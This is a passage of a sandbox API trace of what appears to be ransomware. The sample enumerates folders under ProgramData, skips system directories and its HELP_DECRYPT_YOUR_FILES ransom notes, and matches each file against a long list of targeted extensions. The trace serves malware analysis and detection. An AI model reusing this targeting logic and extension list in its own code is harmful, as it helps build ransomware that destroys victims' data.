	[0168.071] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\devicesync\\*.*", lpSrch="programdata") returned 0x0
	[0168.071] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0168.071] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0168.071] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7db2bb72, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.071] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0168.071] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7db2bb72, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7db2bb72, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7db2bb72, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0168.071] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7db05b46, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7db05b46, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7db2bb72, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0168.071] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7db05b46, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7db05b46, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7db2bb72, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0168.071] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0168.072] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0168.072] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd17b1a49, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Diagnosis", cAlternateFileName="DIAGNO~1")) returned 1
	[0168.072] lstrcmpW (lpString1="Diagnosis", lpString2="..") returned 1
	[0168.072] lstrcmpW (lpString1="Diagnosis", lpString2=".") returned 1
	[0168.072] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0168.073] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0168.073] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0168.073] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0168.073] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.073] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.073] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\*.*"
	[0168.073] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd17b1a49, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0168.074] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\*.*") returned 42
	[0168.074] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.074] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\*.*", cchLength=0x2a | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\*.*") returned 0x2a
	[0168.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.074] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="windows") returned 0x0
	[0168.074] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="boot") returned 0x0
	[0168.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="system volume information") returned 0x0
	[0168.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="temp") returned 0x0
	[0168.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="program files") returned 0x0
	[0168.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="appdata") returned 0x0
	[0168.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="application data") returned 0x0
	[0168.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="winnt") returned 0x0
	[0168.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="tmp") returned 0x0
	[0168.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="cache") returned 0x0
	[0168.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.078] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.078] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.078] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="webcache") returned 0x0
	[0168.079] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.079] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="inetcache") returned 0x0
	[0168.079] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.079] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="nvidia") returned 0x0
	[0168.079] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.079] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="packages") returned 0x0
	[0168.079] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.079] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="cookies") returned 0x0
	[0168.080] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.080] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\*.*", lpSrch="programdata") returned 0x0
	[0168.080] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd17b1a49, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.080] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AsimovUploader", cAlternateFileName="ASIMOV~1")) returned 1
	[0168.080] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DownloadedScenarios", cAlternateFileName="DOWNLO~1")) returned 1
	[0168.080] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe1f25738, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DownloadedSettings", cAlternateFileName="DOWNLO~2")) returned 1
	[0168.080] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ETLLogs", cAlternateFileName="")) returned 1
	[0168.080] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf380d4, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf380d4, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3000000, dwReserved0=0x0, dwReserved1=0x0, cFileName="events00.rbs", cAlternateFileName="")) returned 1
	[0168.080] lstrcmpW (lpString1="events00.rbs", lpString2="..") returned 1
	[0168.081] lstrcmpW (lpString1="events00.rbs", lpString2=".") returned 1
	[0168.081] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.081] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="events00.rbs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events00.rbs") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events00.rbs"
	[0168.081] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events00.rbs") returned 51
	[0168.081] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.081] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events00.rbs", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\events00.rbs") returned 0x33
	[0168.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\events00.rbs", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.082] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\events00.rbs" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\events00.rbs") returned="c:\\users\\all users\\microsoft\\diagnosis\\events00.rbs"
	[0168.082] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\events00.rbs") returned 51
	[0168.082] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.082] StrStrW (lpFirst=".rbs", lpSrch=".") returned=".rbs"
	[0168.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.083] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".rbs") returned 0x0
	[0168.083] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5e2a3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xcdf5e2a3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x3509fbde, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc28f5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="events01.rbs", cAlternateFileName="")) returned 1
	[0168.083] lstrcmpW (lpString1="events01.rbs", lpString2="..") returned 1
	[0168.083] lstrcmpW (lpString1="events01.rbs", lpString2=".") returned 1
	[0168.083] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0168.083] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="events01.rbs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events01.rbs") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events01.rbs"
	[0168.083] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events01.rbs") returned 51
	[0168.083] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.084] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\events01.rbs", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\events01.rbs") returned 0x33
	[0168.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\events01.rbs", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.084] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\events01.rbs" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\events01.rbs") returned="c:\\users\\all users\\microsoft\\diagnosis\\events01.rbs"
	[0168.084] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\events01.rbs") returned 51
	[0168.084] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.085] StrStrW (lpFirst=".rbs", lpSrch=".") returned=".rbs"
	[0168.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.085] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db